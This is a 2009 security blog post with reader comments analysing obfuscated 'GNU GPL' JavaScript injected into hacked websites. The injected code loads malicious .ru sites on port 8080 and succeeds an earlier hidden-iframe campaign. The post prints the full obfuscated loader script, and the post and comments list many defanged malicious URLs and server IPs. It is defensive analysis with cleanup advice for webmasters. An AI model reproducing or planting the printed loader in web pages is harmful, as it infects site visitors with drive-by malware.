msgbartop
Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.
msgbarbottom
Loading site search ...

From Hidden Iframes to Obfuscated Scripts

   23 Dec 09   Filed in Website exploits

In December, I noticed that ubiquitous hidden iframes that have been the prevailing site hack this year seemed to have gone. Unmask Parasites finds them on very few sites now. And even on infected sites, I see only old domains, while this attack is known for introducing at least one new domain every day and for frequently updating the iframe code on infected sites.

At the same time I noticed a new type of obfuscated scripts injected into hacked websites. And I believe it’s a new incarnation of the same attack that previously injected hidden iframes.

Here’s the story

A few weeks ago I stumbled upon an infected site with the following script:

/*GNU GPL*/ try{window.onload = function(){var Dlo228l8u771kzw = document.createElement('script');Dlo228l8u771kzw.setAttribute('type', 'text/javascript');Dlo228l8u771kzw.setAttribute('id', 'myscript1');Dlo228l8u771kzw,setAttribute('src', 'h@(t#t^^!p#&:@^$(/$/(j^#^o^o(#$m&)$l$(@!#a$^-!&^$)o@@r##!!g^!(^.$$^s))$p(@(a@@n@)#k^@#w&)i#$r(e(.$!&#c!@o!^()!m#.!&w())3(^@s$&^c$)h&(o#!o&#l&@s!^&-(c#o(#)m@$.&(e$@&!a^s(y(t(a$(^)b)!&l&e@!t(e)(n!n$#)i^(^!s@.^(r^#^$u(#:&8^$)0)^#8^(!0^/!#g##@$$o&o#$g#l!e^($.(@c#o^!)m@/(g&$^o(@o$#(^g($l!e@.##c$)$(o$)!!m^$/($!b!)$)i$n#(g)!.^!c((@&@o^$m)$)/&!&g$(($o)o)@((g#&&l(!e@$.(f($)^&r@&!#/!w@(o(^!r)d()$!#p)!^r(e@#s&)!s(^!@.^(&o$#@r((g^/^^@'.replace(/\!|@|&|\)|\$|\(|#|\^/ig, ''));Dlo228l8u771kzw.setAttribute('defer', 'defer');d ocument.body.appendChild(Dlo228l8u771kzw);}} catch(e) {}

When I deobfuscated it, it made me laugh. This script injected a hidden iframe with the following “src” attribute:

hxxp://joomla-org.spankwire.com.w3schools-com.easytabletennis .ru:8080/google.com/google.com/bing.com/google.fr/wordpress.org/

This looked like overkill. These guys so badly wanted their script to look trustworthy and not only did they prepend the GNU GPL comment to the script, they also included so many reputable site names into the iframe address:

  • joomla-org
  • spankwire.com
  • w3schools-com
  • google.com (2 times!)
  • bing.com
  • google.fr
  • wordpress.org

However all these “brand names” are just subdomains and subdirectories on the malicious site easytabletennis .ru.

Variations

I’ve seen many other similarly infected websites since then. They all had this “GNU GPL” script at the bottom of web pages. However the script itself constantly changes. The most prominent variation is the /*CODE1*/ comment instead of the /*GNU GPL*/. Another change is the addresses of the injected hidden iframes. Here are just a few of them:

hxxp://gamer-com-tw.wrzuta.pl.play-com.brownbagbar .ru:8080/google.com/google.com/wordpress.org/hp.com/surveymonkey.com/
hxxp://xtube-com.blogger.com.pornorama-com.bluejackmusic .ru:8080/hdfcbank.com/hdfcbank.com/google.com/fanpop.com/in.com/
hxxp://clicksor-com.eastmoney.com.mobile-de.homesaleplus .ru:8080/ocn.ne.jp/ocn.ne.jp/classmates.com/linkhelper.cn/google.com/
hxxp://google-com-do.insightexpressai.com.dtiblog-com.greatsalecenter .ru:8080/gsmarena.com/gsmarena.com/metrolyrics.com/qidian.com/google.com/
hxxp://tweetmeme-com.rediff.com.google-com-bd.simpleworldhouse .ru:8080/google.com/google.com/dreamstime.com/att.net/shinobi.jp/
hxxp://php-net.indeed.com.cyworld-com.simpleworldhouse .ru:8080/ebay.com/ebay.com/google.com/blogger.com/myspace.com/
hxxp://yesky-com.naukri.com.thepiratebay-org.viewhomesale .ru:8080/clicksor.com/clicksor.com/guardian.co.uk/google.com/filehippo.com/
hxxp://chip-de.ggpht.com.deezer-com.viewhomesale .ru:8080/google.com/google.com/timeanddate.com/avg.com/zshare.net/
hxxp://wowhead-com.gougou.com.redtube-com.viewhomesale .ru:8080/58.com/58.com/google.com/rediff.com/uol.com.br/
hxxp://it168-com.sky.com.xe-com.viewhomesale .ru:8080/google.com/google.com/pagesjaunes.fr/sify.com/nate.com/
hxxp://seznam-cz.king.com.boston-com.viewhomesale .ru:8080/linkedin.com/linkedin.com/google.com/myfreepaysite.com/stc.com.sa/
hxxp://cbssports-com.google.co.th.literotica-com.viewhomesale .ru:8080/google.com/google.com/mobile9.com/linezing.com/blogger.com/
hxxp://m-w-com.google.at.twitpic-com.mygreatsale .ru:8080/google.com/google.com/cncmax.cn/zaobao.com/37wan.com/
hxxp://clicksor-com.eastmoney.com.mobile-de.homesaleplus .ru:8080/ocn.ne.jp/ocn.ne.jp/classmates.com/linkhelper.cn/google.com/
hxxp://yelp-com.56.com.orkut-com-br.themobisite .ru:8080/priceminister.com/priceminister.com/google.com/engadget.com/jeuxvideo.com/
hxxp://naqigs-com.break.com.etsy-com.votrelib .ru:8080/bloomberg.com/bloomberg.com/mlb.com/google.com/google.com.eg/
hxxp://way2sms-com.plala.or.jp.wikihow-com.sugaryhome .ru:8080/google.com/google.com/qq.com/google.com.mx/orkut.com.br/
hxxp://as-com.scribd.com.gazeta-pl.musicboxpro .ru:8080/google.com/google.com/39.net/51.com/atwiki.jp/
hxxp://google-cn.msn.ca.shoplocal-com.easymusicstore .ru:8080/interia.pl/interia.pl/google.com/empflix.com/debonairblog.com/
hxxp://live.com.google.com.baidu-msn.com.bestartsale .ru:8080/wordpress.com/google-mail.it/livejasmin-photobucket.com/cnet-cnn.com/about-ebay.com/

It looks like the purpose of these ridiculous addresses is to

  • confuse some malware scanners that may consider a script trustworthy when they encounter some trusted domain (e.g. google.com) in the iframe “src” parameter
  • reuse the same domain name reducing the risk of being blacklisted (when malware scanners blacklist full addresses of known malicious iframes ). For example in the above list you can see 6 different addresses on the viewhomesale .ru site. This approach is more economically efficient (crisis?) than throwing away domain names after a single use to evade blacklisting issues. (Of course this doesn’t work with Google who blacklists topmost domains)

Update (Jan 10, 2009): There is a new modification of the malicious script.

/*LGPL*/ try{ window.onload = function(){var Siqonuqvd07 = document.createElement('s(c^^$r^^i))#(p)$t@^!'.replace(/@|\^|\)|&|\(|#|\!|\$/ig, '')); ....

Now instead of GNU GPL it uses LGPL (do they really specify licenses? ;-) ) and slightly heavier obfuscation. Once deobfuscated, the rest is the same.

Common features

I have also noticed that these “GNU GPL” scripts are often times encountered on websites infected with Gumblar. This means that stolen FTP credentials are the most probable vector of the site infection.

When I found time to inspect these scripts more thoroughly, I figured that they were direct successors of the hidden iframes that I wrote about so much this year. Here is what the have in common:

  • use of port 8080
  • frequently changing .ru domains
  • looks like only web pages with predefined file names are infected (those that have words “index“, “home“, “default“) (not only web pages are being infected this time, see below)
  • nginx web server on port 8080 on the malicious sites
  • Legitimate content on port 80 served by Apache.
  • Each malicious domain is mapped to 5 different IPs (fail-proof setup plus load balancing)

You can see all current IPs of the malicious sites using the dig command. Here is its current output:

bluejackin.ru. 432 IN A 95.211.10.130
bluejackin.ru. 432 IN A 91.121.166.221
bluejackin.ru. 432 IN A 91.121.211.226
bluejackin.ru. 432 IN A 94.23.4.164
bluejackin.ru. 432 IN A 95.211.4.193

This set of 5 IPs is not static. Some of them change from time to time. The IPs belong to hacked legitimate dedicated and virtual didicated servers.

Leaseweb and OVH: safe harbors for hackers?

One interesting observation: lately, all those IPs belong to networks of the two European hosting providers: Leaseweb (Netherlands) and OVH.com (France).

  • 82.192.88.35 – Netherlands Amsterdam Leaseweb
  • 91.121.49.129 – France Paris Ovh Sas
  • 91.121.166.221 – France Ovh Sas
  • 91.121.211.226 – France Paris Ovh Sas
  • 94.23.4.164 – France Ovh Sas
  • 94.23.206.229 – France Ovh Sas
  • 95.211.4.193 – Netherlands Amsterdam Leaseweb
  • 95.211.10.130 – Netherlands Amsterdam Leaseweb

Is it coincidence or something attracts hackers to LeaseWeb and OVH?

As I know from my previous investigation, the nginx servers on port 8080 on hacked sites are just reverse proxies that hide the central malicious server that contain all the exploits. Mdvhost .com has been used as this main server for the iframe attack. It serves the malicious content off of port 4480.

I decided to check mdvhost .com now. This time it returned an obfuscated javascript similar to those loaded into the malicious iframes with long ridiculous addresses. When I deobfuscated it, I found a reference to “joomla-org.spankwire.com.w3schools-com.easytabletennis .ru:8080” – clear evedence these new obfuscated scripts use mdvhost .com and are just successors of the infamous iframe attack.

Mdvhost .com domain is mapped to 2 IP addresses: 95 .211 .98 .141 and 95 .211 .98 .142, which are also used as name servers (ns1.mdvhost .com and ns2.mdvhost .com). It won’t be surprise if I tell you that this site is also on the Leaseweb network. Back in September Leaseweb had been contacted via Stopbadware.org about this malicious site on their network. No reaction followed. Is it the sign that they don’t care that they host the central malicious server of the malware attack that infected millions of computers and hundreds of thousands websites?

Update (Dec 30, 2009): LeaseWeb’s Security Officer has responded to this post and now all the malicious servers seems to have been removed from the LeaseWeb network.

Back to the malware attack

Now that we know that the attack uses the same techniques and the same servers, I guess the rest remains pretty much the same: the same way of hacking websites (stolen FTP credentials) and the same exploit files that use vulnerabilities in Flash and Adobe Reader (or maybe updated versions that exploit new unpatched vulnerabilities in Adobe products – I leave this to malware researchers).

What is different?

  • Obfuscated script instead of hidden iframes.
  • Not only do they inject the script at the bottom of web pages, they also inject it at the bottom of .js files.

To webmasters:

Since it’s a successor of the known iframe attack that uses stolen FTP credentials, all the clean up and prevention instructions should be pretty much the same.

  • Scan your local PC for malware
  • Make sure your software is up-to-date (Windows, web browser, browser plugins, such as Flash, Adobe Reader, Java, QuickTime, etc) – highly recommended.
  • Once your PC is clean, change all site passwords and keep them secure. Don’t save them in FTP programs (the malware behind this attack steals FTP credentials directly from program settings)
  • Replace all infected files with their clean copies from a backup (Or just remove everything and then restore the whole site from a backup to be on the safe side)

Have your say

Did I miss anything? Don’t hesitate to post your comments and corrections here.

By the way, Happy Holidays!

Related posts:

Reader's Comments (52)

  1. |

    [...] This post was mentioned on Twitter by Denis, Oscar. Oscar said: RT @unmaskparasites: [blog] From Hidden Iframes to Obfuscated Scripts http://bit.ly/5qMAzk – *GNU GPL* mal-scripts + rogue servers on Le … [...]

  2. |

    I want to thank you for all the work you are doing in investigating, documenting and warning about this sort of criminal behaviour.

    The company I work for was hit by this sort of thing a couple of months ago and it has fallen to me to pick up the pieces – iframe style injection of code pointing to a russian malware site (flagged by google). It is both painful and scary.

    I now keep a close watch and subscribe to your site!

    Thanks again!

    Alastair

  3. |

    Hi,

    I’m LeaseWeb’ Security Officer and therefore responsible for handling abuse.

    First, please let me introduce LeaseWeb. We are a dedicated hosting provider with approx 22,000 servers in use who generate 500+ Gpbs of peak traffic. We provide hardware, housing and a reliable internet connection for a ‘unbeatable’ price. We do not provide managed hosting whereby we do system administration, this is left as a task for our customer. As most customers are internet professionals (like resellers) this works very well.

    As to our abuse handling:
    When we receive a abuse notification about an ip address we will forward the notification to our reseller with a 24 hour response time. For malware/phishing sites we use a shorter limit. If the reseller/customer fails to respond we normally will null the ip un till the customer has contacted us and ensures us he will remove the offending site/code.

    As a rule we do not communicate to the person who sends us the abuse notification, so not receiving a reply does not indicate LeaseWeb has not received the notification or isn’t taking action to it.

    If you have any questions please mail me at
    a.dejoode-at-leaseweb.com.

    Thanks.

    Alex de Joode
    Security Officer
    LeaseWeb BV

    • |

      Hi Alex,

      Thanks for taking time to respond.

      I completely understand that you don’t manage servers yourselves. At the same time your TOS should prohibit your customers from using servers for illegal activities.

      And it’s OK not to receive a response for abuse notifications. However, I don’t see any action against mdvhost .com which is still hosted on the same two IPs on your network (the abuse report was in September).

      Hope, now you’ll take action against the IP addresses mentioned in this post (I believe the servers are hacked and hackers had installed nginx on port 8080 to work as a reverse proxy for mvdhost .com or maybe some other sites)

  4. |

    Great post Denis.

    Since publishing detection for this we have several hundred sites infected. If I get time I will update our blog with more information :)

    http://www.sophos.com/blogs/sophoslabs/v/post/8046

  5. |

    Please check my article about this issue:

    hxxp://justcoded.com/article/gumblar-family-virus-removal-tool/

  6. |

    [...] du 24/12 – 23HOO] Beaucoup plus d’info ici Tags: Blog, fail, sécurité Partager cet [...]

  7. |

    [...] is &#118ia &#99ompromised F&#84P &#99reden&#116ials. My &#99olleague o&#118er a&#116 &#116he Unmas&#107 Parasi&#116es. Blog &#104as also r&#101port&#101d s&#101&#101ing larg&#101 nu&#109b&#101rs of sit&#101s [...]

  8. |

    [...] A priori, l’infection provenait d’un malware sur mon PC qui utilisé mon client FTP pour se propager. [...]

  9. |

    I want to thank you for this article!

    Just a week ago my website was hacked in this manner.

    After reading your article, I starting searching the web pages visitors got a malware warning with. I just could not find the special script mentioned in your article in any of those web pages.

    I downloaded my whole website to my hard drive. I did a search on all the files for the phrase “GNU GPL”. There it was in the fw_menu.js file. I forgot all about this file. It runs the side menu bar for the web site. That is why the warning message showed up all over the place for visitors. Most of the web pages access that file.

    I have uploaded a correct version of the fw_menu.js file to my website.

    You are my hero!

    cindy

  10. |

    They are now also using:

    hxxp://118114-cn.google.ie.abc-go-com.mygreatsale .ru:8080/novinky.cz/novinky.cz/imagefap.com/play.com/google.com/

    Many thanks for the blogpost, and I would also like to thank LeaseWeb for their statement (being a LW customer I really appreciate the response).

  11. |

    WHERE IS THE fw_menu.js ON A JOOMLA SITE

    I downloaded my whole website to my hard drive. I did a search on all the files for the phrase “GNU GPL”. There it was in the fw_menu.js file.
    —–
    Edit by Denis: I removed your site link from your signature because the site is still hacked (I see cloaked spammy content)

  12. |

    hxxp://hotlinkimage-com.mozilla.org.wikimedia-org.ampsguide .ru:8080/google.ru/google.ru/seznam.cz/focus.de/google.com/
    hxxp://mynet-com.mobile.de.nate-com.ampsguide .ru:8080/travian.com/travian.com/google.com/google.ie/spankwire.com/
    hxxp://craigslist-ca.laredoute.fr.teacup-com.ampsguide .ru:8080/elance.com/elance.com/smashingmagazine.com/google.com/startimes2.com/
    hxxp://google-at.hostgator.com.reverso-net.lagworld .ru:8080/google.com/google.com/businessweek.com/drupal.org/5d6d.com/
    hxxp://experts-exchange-com.mcssl.com.guardian-co-uk.bestbob .ru:8080/debonairblog.com/debonairblog.com/ifolder.ru/google.com/warriorforum.com/
    hxxp://reverso-net.altervista.org.google-co-za.bestbob .ru:8080/google.com/google.com/last.fm/wowarmory.com/mixi.jp/
    hxxp://watch-movies-online-tv.slutload.com.biglobe-ne-jp.suesite .ru:8080/tudou.com/tudou.com/seesaa.net/google.com/51.la/
    hxxp://liveinternet-ru.webmasterworld.com.opera-com.suesite .ru:8080/novoteka.ru/novoteka.ru/blogbus.com/google.com/alice.it/

    hxxp://badoo-com.ziddu.com.yourfilehost-com.YourBlenderParts .ru
    hxxp://monografias-com.indiatimes.com.tiscali-it.YourSuperPool .ru
    hxxp://auto-ru.sakura.ne.jp.rapidshare-com.airnetdirect .ru
    hxxp://nba-com.virginmedia.com.yesky-com.supernewstuff .ru
    supermicrotag .ru
    supernewstuff .ru
    thelaceweb .ru
    webnetenglish .ru
    thechocolateweb .ru
    worldwebworld .ru
    sugaryhome .ru
    egreatsale .ru
    usaworldwideweb .ru
    webdesktopnet .ru
    whosaleonline .ru
    carswebnet .ru

  13. |

    Thanks everyone.

    We have been having a discussion on this virus on this threat as well. My posts specifically show what we have narrowed down on the user machine (what this iframe virus will launch if successful) for what we believe is a rootkit PSW.OnlineGames Virus which isnt being picked up by any of the major programs without some effort….

    http://www.bleuken.com/2009/12/20/fixing-gnu-gpl-virusmalware/

  14. |

    Hello,

    Some more …

    hxxp://ameba-jp.bluehost.com.4chan-org.guidebat .ru:8080/google.com/google.com/startimes2.com/google.co.jp/zol.com.cn/
    hxxp://aol-co-uk.blogger.com.google-gr.theaonline .ru:8080/kaixin.com/kaixin.com/amazon.co.uk/hostgator.com/google.com/
    hxxp://argos-co-uk.king.com.petardas-com.johnsite .ru:8080/google.com/google.com/hudong.com/optmd.com/google.cl/
    hxxp://ask-com.ebuddy.com.01net-com.guidebat .ru:8080/amazon.com/amazon.com/google.com/fedex.com/southwest.com/
    hxxp://att-net.google.cl.download-com.superore .ru:8080/rayfile.com/rayfile.com/google.com/skycn.com/google.com.do/
    hxxp://bbc-co-uk.pconline.com.cn.tradedoubler-com.bestbob .ru:8080/sponichi.co.jp/sponichi.co.jp/google.com/elance.com/orkut.com.br/
    hxxp://comcast-com.globo.com.jrj-com-cn.superore .ru:8080/google.com/google.com/gmx.net/dict.cc/anonym.to/
    hxxp://comcast-com.ppstream.com.bebo-com.ampsguide .ru:8080/google.com/google.com/timeanddate.com/cnet.com/mynet.com/
    hxxp://dict-cc.google.com.ph.asg-to.guidebat .ru:8080/telegraph.co.uk/telegraph.co.uk/metrolyrics.com/google.com/mediaplex.com/
    hxxp://discuz-net.livejournal.com.clickbank-com.guidebat .ru:8080/orbitz.com/orbitz.com/apple.com/oricon.co.jp/google.com/
    hxxp://ebay-co-uk.leboncoin.fr.gazzetta-it.bestbob .ru:8080/163.com/163.com/google.com/ngoisao.net/godaddy.com/
    hxxp://filestube-com.docstoc.com.sfgate-com.superore .ru:8080/ifeng.com/ifeng.com/dtiblog.com/naukri.com/google.com/
    hxxp://forbes-com.wellsfargo.com.foodnetwork-com.guidebat.ru:8080/google.com/google.com/aljazeera.net/angege.com/sun.com/
    hxxp://freshwap-net.kijiji.ca.china-com.superore .ru:8080/ime.nu/ime.nu/informer.com/google.com/bloomberg.com/
    hxxp://ft-com.39.net.yallakora-com.guidebat .ru:8080/gametrailers.com/gametrailers.com/google.com/tmz.com/foxnews.com/
    hxxp://google-de.babylon.com.google-com-bd.guidebat .ru:8080/softonic.com/softonic.com/wikia.com/uimserv.net/google.com/
    hxxp://google-fi.king.com.iciba-com.worldsouth .ru:8080/evony.com/evony.com/google.nl/articlesbase.com/google.com/
    hxxp://google-hr.imagebam.com.odnoklassniki-ru.lagworld .ru:8080/autohome.com.cn/autohome.com.cn/pornhost.com/google.com.ua/google.com/
    hxxp://guardian-co-uk.uol.com.br.incredimail-com.thegiftsale .ru:8080/auto.ru/auto.ru/google.com/southwest.com/keepvid.com/
    hxxp://huanqiu-com.kijiji.ca.it168-com.worldsouth .ru:8080/free.fr/free.fr/monografias.com/google.com/milliyet.com.tr/
    hxxp://imagevenue-com.leo.org.comcast-net.lagworld .ru:8080/admagnet.net/admagnet.net/google.com/wired.com/joy.cn/
    hxxp://joy-cn.weebly.com.gazzetta-it.guidebat .ru:8080/google.com/google.com/free.fr/woot.com/wordreference.com/
    hxxp://jrj-com-cn.aebn.net.adbrite-com.superore .ru:8080/dmm.co.jp/dmm.co.jp/google.com/technorati.com/google.com.au/
    hxxp://justin-tv.veoh.com.wellsfargo-com.guidebat .ru:8080/google.com/google.com/zanox-affiliate.de/foxnews.com/lenovo.com/
    hxxp://kino-to.lauxanh.us.keyrun-cn.bestbob .ru:8080/azet.sk/azet.sk/suite101.com/google.com/webmd.com/
    hxxp://linternaute-com.aufeminin.com.netlog-com.superore .ru:8080/google.com/google.com/google.com.ec/eorezo.com/guardian.co.uk/
    hxxp://literotica-com.kaixin001.com.partypoker-com.guidebat .ru:8080/deviantart.com/deviantart.com/msn.ca/google.com/dantri.com.vn/
    hxxp://mapquest-com.virginmedia.com.mozilla-com.bestbob .ru:8080/google.com/google.com/foxsports.com/deviantart.com/opendns.com/
    hxxp://miibeian-gov-cn.google.at.ebay-co-uk.guidebat .ru:8080/joy.cn/joy.cn/mlb.com/google.com/squidoo.com/
    hxxp://myfreepaysite-com.optmd.com.wrzuta-pl.theaonline .ru:8080/toysrus.com/toysrus.com/google.com/19lou.com/scribd.com/
    hxxp://nifty-com.opendns.com.incredimail-com.musicboxpro .ru:8080/travian.com/travian.com/google.com/fastclick.com/chase.com/
    hxxp://odesk-com.01net.com.proboards-com.guidebat .ru:8080/google.com/google.com/megaupload.com/google.com.pk/jeuxvideo.com/
    hxxp://oricon-co-jp.googleusercontent.com.5d6d-com.bestbob .ru:8080/iciba.com/iciba.com/redtube.com/google.com/tripod.com/
    hxxp://passport-net.mcssl.com.zynga-com.superore .ru:8080/google.com/google.com/mercadolivre.com.br/pantip.com/getafreelancer.com/
    hxxp://pogo-com.51.la.mihanblog-com.johnsite .ru:8080/bankofamerica.com/bankofamerica.com/gumtree.com/renren.com/google.com/
    hxxp://pornorama-com.tom.com.cj-com.worldsouth .ru:8080/google.com/google.com/rincondelvago.com/rakuten.ne.jp/google.be/
    hxxp://sciencedirect-com.lequipe.fr.gamestop-com.superore .ru:8080/verycd.com/verycd.com/google.com/zaobao.com/rakuten.co.jp/
    hxxp://sina-com-cn.linkedin.com.haberturk-com.ampsguide .ru:8080/globo.com/globo.com/google.com/mediaplex.com/yimg.com/
    hxxp://stackoverflow-com.douban.com.fandango-com.guidebat .ru:8080/google.com/google.com/xbox.com/onet.pl/petardas.com/
    hxxp://stackoverflow-com.google.com.kw.tweetmeme-com.lagworld .ru:8080/google.com/google.com/ganji.com/bizrate.com/ddmap.com/
    hxxp://surveymonkey-com.love21cn.com.facebook-com.superore .ru:8080/bing.com/bing.com/fifa.com/google.com/advertserve.com/
    hxxp://tuenti-com.rayfile.com.friendster-com.guidebat .ru:8080/google.com/google.com/5d6d.com/orkut.com.br/ebay.de/
    hxxp://tumblr-com.corriere.it.17173-com.guidebat .ru:8080/odesk.com/odesk.com/blogbus.com/virgilio.it/google.com/
    hxxp://tv-com.google.lk.alipay-com.ampsguide .ru:8080/exblog.jp/exblog.jp/tianya.cn/google.com/examiner.com/
    hxxp://twitpic-com.youku.com.ebay-de.guidebat .ru:8080/tattoodle.com/tattoodle.com/kino.to/lenovo.com/google.com/
    hxxp://uploaded-to.ebay.com.filefactory-com.ampsguide .ru:8080/google.com/google.com/imageshack.us/filestube.com/1und1.de/
    hxxp://usatoday-com.aboutus.org.justin-tv.superore .ru:8080/articlesbase.com/articlesbase.com/google.com/39.net/google.com.ua/
    hxxp://ustream-tv.megaporn.com.rakuten-ne-jp.superore .ru:8080/shareasale.com/shareasale.com/google.com/telegraph.co.uk/icio.us/
    hxxp://veoh-com.angege.com.daqi-com.guidebat .ru:8080/google.com/google.com/surfthechannel.com/evony.com/flickr.com/
    hxxp://verizonwireless-com.azet.sk.kijiji-ca.guidebat .ru:8080/mozilla.org/mozilla.org/google.com/118114.cn/mediaplex.com/
    hxxp://victoriassecret-com.timeanddate.com.seriesyonkis-com.guidebat .ru:8080/smashingmagazine.com/smashingmagazine.com/google.com.my/bu520.com/google.com/
    hxxp://wretch-cc.qip.ru.reuters-com.ampsguide .ru:8080/pagesjaunes.fr/pagesjaunes.fr/lauxanh.us/google.com/google.com.hk/
    hxxp://wunderground-com.hdfcbank.com.fanpop-com.lagworld .ru:8080/uimserv.net/uimserv.net/google.com/gametrailers.com/mainichi.jp/
    hxxp://xanga-com.chinaren.com.aufeminin-com.guidebat .ru:8080/startimes2.com/startimes2.com/conduit.com/digg.com/google.com/
    hxxp://yam-com.bing.com.advmaker-ru.ampsguide .ru:8080/google.com/google.com/ikea.com/typepad.com/enet.com.cn/
    hxxp://yellowpages-com.tweetmeme.com.asg-to.lagworld .ru:8080/google.com/google.com/foxnews.com/1und1.de/im286.com/
    ——————————–

  15. |

    Welcome, … somehow my post got in twice.

  16. |

    [...] Tarmo Randel CERT.EE-st hoiatab veebide administraatoreid pahatahtliku skriti eest, mille levik Eestis on võtnud juba pandeemia ilme ning nakatas muuhulgas ka ERR-i veebid. Pahalase täpsemat iseloomustust saab lugeda siit. [...]

  17. |

    [...] 詳細についてレポートしているこちらの海外のBlogをみると、いやーよく出来ていること。 [...]

  18. |

    hxxp://dantri-com-vn.hoopchina.com.ibm-com.superore.ru:8080/optmd.com/optmd.com/google.com/associatedcontent.com/cnn.com/
    hxxp://2ch-net.topshareware.com.gmodules-com.webnetlender.ru:8080/exbii.com/exbii.com/biglobe.ne.jp/voila.fr/google.com/
    hxxp://oneindia-in.alisoft.com.allrecipes-com.warbest.ru:8080/google.com/google.com/neobux.com/linksynergy.com/w3schools.com/
    hxxp://payserve-com.google.cn.opera-com.guidebat.ru:8080/google.com/google.com/disney.go.com/hc360.com/verizonwireless.com/
    hxxp://zhaopin-com.foxsports.com.mozilla-com.superore.ru:8080/reddit.com/reddit.com/timesonline.co.uk/google.com/torrents.ru/
    hxxp://imdb-com.focus.cn.alipay-com.guidebat.ru:8080/google.com/google.com/4chan.org/stumbleupon.com/linkhelper.cn/
    hxxp://ggpht-com.news3insider.com.sponichi-co-jp.superore.ru:8080/imdb.com/imdb.com/newegg.com/multiply.com/google.com/
    hxxp://ifeng-com.51job.com.articlesbase-com.ampsguide.ru:8080/abril.com.br/abril.com.br/google.com/dtiblog.com/yahoo.com/
    hxxp://geocities-jp.depositfiles.com.reuters-com.johnsite.ru:8080/en.wordpress.com/en.wordpress.com/ca.gov/google.com/craigslist.ca/
    hxxp://gamer-com-tw.wrzuta.pl.play-com.brownbagbar.ru:8080/google.com/google.com/wordpress.org/hp.com/surveymonkey.com/
    hxxp://tomshardware-com.veoh.com.cartoonnetwork-com.superaguide.ru:8080/youjizz.com/youjizz.com/katz.cd/thefreedictionary.com/google.com/

  19. |

    hxxp://4shared-com.douban.com.mercadolibre-com-mx.thechocolateweb.ru:8080/google.com/google.com/articlesbase.com/typepad.com/mysql.com/
    hxxp://5d6d-com.optmd.com.icio-us.ampsguide.ru:8080/bangbros1.com/bangbros1.com/google.sk/google.com/pornbb.org/
    hxxp://alipay-com.slickdeals.net.echoroukonline-com.lagworld.ru:8080/wordpress.org/wordpress.org/urbandictionary.com/google.com/classmates.com/
    hxxp://aol-com.univision.com.nu-nl.worldwebworld.ru:8080/pcauto.com.cn/pcauto.com.cn/yoka.com/1133.cc/google.com/
    hxxp://blogcatalog-com.google.ie.google-co-jp.webnetloans.ru:8080/yandex.ua/yandex.ua/google.com.tw/google.com/robtex.com/
    hxxp://blogger-com.surfthechannel.com.buzznet-com.thechocolateweb.ru:8080/hp.com/hp.com/ikea.com/who.is/google.com/
    hxxp://boston-com.symantec.com.cocolog-nifty-com.worldwebworld.ru:8080/msn.ca/msn.ca/iwiw.hu/google.com/yoka.com/
    hxxp://bp-blogspot-com.moneycontrol.com.google-cz.thechocolateweb.ru:8080/google.com/google.com/yahoo.com.cn/google.co.hu/gamestop.com/
    hxxp://cbssports-com.shinobi.jp.gamer-com-tw.webnetenglish.ru:8080/foxsports.com/foxsports.com/google.com/statcounter.com/getiton.com/
    hxxp://china-com-cn.tomshardware.com.taringa-net.theatticsale.ru:8080/ggpht.com/ggpht.com/google.com/disney.go.com/hattrick.org/
    hxxp://chinaren-com.avg.com.01net-com.thechocolateweb.ru:8080/1und1.de/1und1.de/google.com/bu520.com/yesky.com/
    hxxp://cnzz-com.play.com.detik-com.thechocolateweb.ru:8080/babylon.com/babylon.com/google.com/reddit.com/ninemsn.com.au/
    hxxp://detik-com.craigslist.ca.amazon-fr.thechocolateweb.ru:8080/clicksor.com/clicksor.com/weebly.com/google.com/google.fi/
    hxxp://dict-cc.youku.com.bizrate-com.thechocolateweb.ru:8080/rambler.ru/rambler.ru/google.com/jcpenney.com/google.pl/
    hxxp://docstoc-com.zappos.com.realitykings-com.webdesktopnet.ru:8080/pch.com/pch.com/comcast.net/google.com/hi5.com/
    hxxp://free-fr.rapidshare.com.hotlinkimage-com.thechocolateweb.ru:8080/51job.com/51job.com/redtube.com/gittigidiyor.com/google.com/
    hxxp://gap-com.basecamphq.com.bestbuy-com.xboxliveweb.ru:8080/nba.com/nba.com/google.com/pornbb.org/mininova.org/
    hxxp://godaddy-com.dantri.com.vn.gc-ca.worldwebworld.ru:8080/google.com/google.com/google.hr/4shared.com/alibaba.com/
    hxxp://google-com-do.stayfriends.de.indiatimes-com.thechocolateweb.ru:8080/eorezo.com/eorezo.com/google.com/google.at/ibm.com/
    hxxp://google-com-sa.plala.or.jp.last-fm.webnetenglish.ru:8080/google.com/google.com/pchome.net/wrzuta.pl/careerbuilder.com/
    hxxp://ign-com.sedoparking.com.xunlei-com.thechocolateweb.ru:8080/thepiratebay.org/thepiratebay.org/shopping.com/google.be/google.com/
    hxxp://imageshack-us.tom.com.facebook-com.thechocolateweb.ru:8080/cricinfo.com/cricinfo.com/stackoverflow.com/google.com/vente-privee.com/
    hxxp://immobilienscout24-de.zshare.net.ebay-com-au.worldwebworld.ru:8080/hudong.com/hudong.com/biglobe.ne.jp/google.com/wrzuta.pl/
    hxxp://incredimail-com.att.com.sanook-com.thechocolateweb.ru:8080/adbrite.com/adbrite.com/google.com/howstuffworks.com/partypoker.com/
    hxxp://iza-ne-jp.persianblog.ir.seriesyonkis-com.webnetenglish.ru:8080/google.com/google.com/yallakora.com/sabah.com.tr/orange.fr/
    hxxp://kaixin001-com.sendspace.com.gc-ca.worldwebworld.ru:8080/hp.com/hp.com/orf.at/google.com/mail.com/
    hxxp://kohls-com.ibm.com.corriere-it.worldwebworld.ru:8080/yimg.com/yimg.com/google.com/jugem.jp/ebuddy.com/
    hxxp://kompas-com.55bbs.com.telegraph-co-uk.webnetenglish.ru:8080/google.pt/google.pt/yimg.com/windowslive.com/google.com/
    hxxp://lemonde-fr.mtv.com.zshare-net.carswebnet.ru:8080/forumcommunity.net/forumcommunity.net/google.ro/terra.com.br/google.com/
    hxxp://liveinternet-ru.google.com.hottiestar-com.worldwebworld.ru:8080/4shared.com/4shared.com/google.com/katz.cd/dailymail.co.uk/
    hxxp://mail-ru.multiupload.com.megaporn-com.webnetenglish.ru:8080/gmodules.com/gmodules.com/juegos.com/btjunkie.org/google.com/
    hxxp://mediaplex-com.youtube.com.pixnet-net.ampsguide.ru:8080/dangdang.com/dangdang.com/google.cl/hurriyet.com.tr/google.com/
    hxxp://meinvz-net.fifa.com.feedburner-com.thechocolateweb.ru:8080/hatena.ne.jp/hatena.ne.jp/ggpht.com/xinhuanet.com/google.com/
